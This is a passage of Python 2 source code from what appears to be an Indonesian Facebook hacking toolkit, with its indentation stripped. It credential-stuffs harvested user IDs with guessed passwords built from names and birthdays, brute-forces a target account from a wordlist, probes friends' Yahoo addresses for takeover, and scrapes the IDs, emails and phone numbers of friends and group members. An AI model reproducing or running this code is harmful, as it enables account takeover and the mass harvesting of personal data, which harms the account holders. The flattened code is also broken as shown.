idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
